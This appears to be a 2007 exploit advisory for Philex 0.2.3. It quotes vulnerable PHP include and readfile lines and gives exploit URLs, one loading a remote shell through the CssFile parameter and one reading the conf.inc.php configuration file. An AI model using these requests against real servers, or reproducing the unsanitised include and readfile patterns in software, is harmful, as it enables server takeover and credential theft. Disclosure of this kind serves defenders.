Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities

2007-03-25T00:00:00
ID SECURITYVULNS:DOC:16461
Type securityvulns
Reporter Securityvulns
Modified 2007-03-25T00:00:00

Description

Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities

D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz

Discovered by: GloD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

V.Code Include:

<?include $CssFile;?>

Exploit Remote File Include:

[Path_Philex]/header.inc.php?CssFile=Shell

V.Code Disclosure:

readfile($HTTP_GET_VARS["file"]);

Exploit Remote File Disclosure:

[Path_Philex]/download.php?file=conf.inc.php

milw0rm.com [2007-03-23]